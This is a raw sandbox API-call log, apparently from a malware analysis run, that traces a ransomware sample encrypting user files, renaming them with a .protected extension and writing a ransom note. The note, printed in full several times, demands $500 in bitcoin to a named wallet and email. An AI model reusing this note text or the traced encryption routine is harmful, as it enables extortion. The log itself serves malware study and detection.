Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.725] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0086.726] lstrlenA (lpString="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") returned 684 [0086.726] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0086.726] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.726] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.726] CloseHandle (hObject=0x150) returned 1 [0086.726] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.726] lstrcmpiW (lpString1="updates.xml", lpString2="Windows") returned -1 [0086.726] lstrcmpiW (lpString1="updates.xml", lpString2="Program Files") returned 1 [0086.726] lstrcmpiW (lpString1="updates.xml", lpString2="Program Files (x86)") returned 1 [0086.726] lstrcmpiW (lpString1="updates.xml", lpString2="$Recycle.bin") returned 1 [0086.726] lstrcmpiW (lpString1="updates.xml", lpString2="System Volume Information") returned 1 [0086.726] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml") returned 92 [0086.726] StrStrIW (lpFirst="updates.xml", lpSrch=".protected") returned 0x0 [0086.726] lstrcmpW (lpString1="updates.xml", lpString2="RESTORE_FILES.txt") returned 1 [0086.726] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.727] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.727] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml") returned 92 [0086.727] StrStrW (lpFirst="updates.xml", lpSrch=".txt") returned 0x0 [0086.727] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml") returned 92 [0086.727] StrStrW (lpFirst="updates.xml", lpSrch=".rar") returned 0x0 [0086.727] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml") returned 92 [0086.727] StrStrW (lpFirst="updates.xml", lpSrch=".zip") returned 0x0 [0086.727] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x39, lpOverlapped=0x0) returned 1 [0086.729] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffc7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.729] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x39, lpOverlapped=0x0) returned 1 [0086.730] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.730] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0086.730] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0086.730] CloseHandle (hObject=0x150) returned 1 [0086.731] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml.protected") returned 102 [0086.731] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates.xml.protected")) returned 1 [0086.731] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0086.732] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0086.732] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\RESTORE_FILES.txt") returned 98 [0086.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0086.732] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.732] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0086.733] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.733] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.733] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.733] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0086.733] CloseHandle (hObject=0x14c) returned 1 [0086.734] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0086.734] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0086.734] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\RESTORE_FILES.txt") returned 81 [0086.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.735] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.735] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0086.736] lstrlenA (lpString="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") returned 684 [0086.736] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0086.736] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.736] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.736] CloseHandle (hObject=0xd8) returned 1 [0086.736] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0086.736] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0086.737] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\RESTORE_FILES.txt") returned 73 [0086.737] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0086.737] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.737] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0086.738] lstrlenA (lpString="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") returned 684 [0086.738] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0086.738] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.738] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.738] CloseHandle (hObject=0xd4) returned 1 [0086.739] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0086.739] lstrcmpiW (lpString1="Temp", lpString2="Windows") returned -1 [0086.739] lstrcmpiW (lpString1="Temp", lpString2="Program Files") returned 1 [0086.739] lstrcmpiW (lpString1="Temp", lpString2="Program Files (x86)") returned 1 [0086.739] lstrcmpiW (lpString1="Temp", lpString2="$Recycle.bin") returned 1 [0086.739] lstrcmpiW (lpString1="Temp", lpString2="System Volume Information") returned 1 [0086.739] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp") returned 52 [0086.739] lstrcmpW (lpString1="Temp", lpString2=".") returned 1 [0086.739] lstrcmpW (lpString1="Temp", lpString2="..") returned 1 [0086.740] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*") returned 54 [0086.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0086.740] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.740] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.740] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.740] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.740] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.740] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\.") returned 54 [0086.740] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.740] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 
[0086.740] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.740] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.740] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.740] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.740] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.740] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\..") returned 55 [0086.740] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.740] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.740] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.741] lstrcmpiW (lpString1="0r6e.m4a", lpString2="Windows") returned -1 [0086.741] lstrcmpiW (lpString1="0r6e.m4a", lpString2="Program Files") returned -1 [0086.741] lstrcmpiW (lpString1="0r6e.m4a", lpString2="Program Files (x86)") returned -1 [0086.741] lstrcmpiW (lpString1="0r6e.m4a", lpString2="$Recycle.bin") returned 1 [0086.741] lstrcmpiW (lpString1="0r6e.m4a", lpString2="System Volume Information") returned -1 [0086.741] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a") returned 61 [0086.741] StrStrIW (lpFirst="0r6e.m4a", lpSrch=".protected") returned 0x0 [0086.741] lstrcmpW (lpString1="0r6e.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0086.741] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.741] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0r6e.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.741] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a") returned 61 [0086.741] StrStrW (lpFirst="0r6e.m4a", lpSrch=".txt") returned 0x0 [0086.741] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a") returned 61 [0086.741] StrStrW (lpFirst="0r6e.m4a", lpSrch=".rar") returned 0x0 [0086.741] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a") returned 61 [0086.741] StrStrW (lpFirst="0r6e.m4a", lpSrch=".zip") returned 0x0 [0086.742] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.742] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.742] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.743] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.743] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.743] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.743] CloseHandle (hObject=0xd8) returned 1 [0086.743] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a.protected") returned 71 [0086.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0r6e.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0r6e.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0r6e.m4a.protected")) returned 1 [0086.745] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.745] lstrcmpiW (lpString1="2glu0d7uHzfV6.jpg", lpString2="Windows") returned -1 [0086.745] lstrcmpiW (lpString1="2glu0d7uHzfV6.jpg", lpString2="Program Files") returned -1 [0086.745] lstrcmpiW (lpString1="2glu0d7uHzfV6.jpg", lpString2="Program Files (x86)") returned -1 [0086.745] lstrcmpiW (lpString1="2glu0d7uHzfV6.jpg", lpString2="$Recycle.bin") returned 1 [0086.745] lstrcmpiW (lpString1="2glu0d7uHzfV6.jpg", lpString2="System Volume Information") returned -1 [0086.745] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg") returned 70 [0086.745] StrStrIW (lpFirst="2glu0d7uHzfV6.jpg", lpSrch=".protected") returned 0x0 [0086.745] lstrcmpW (lpString1="2glu0d7uHzfV6.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0086.745] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.745] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.745] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\2glu0d7uhzfv6.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.745] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg") returned 70 [0086.745] StrStrW (lpFirst="2glu0d7uHzfV6.jpg", lpSrch=".txt") returned 0x0 [0086.745] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg") returned 70 [0086.746] StrStrW (lpFirst="2glu0d7uHzfV6.jpg", lpSrch=".rar") returned 0x0 [0086.746] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\2glu0d7uHzfV6.jpg") returned 70 [0086.746] StrStrW (lpFirst="2glu0d7uHzfV6.jpg", lpSrch=".zip") returned 0x0 [0086.746] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.746] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.746] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 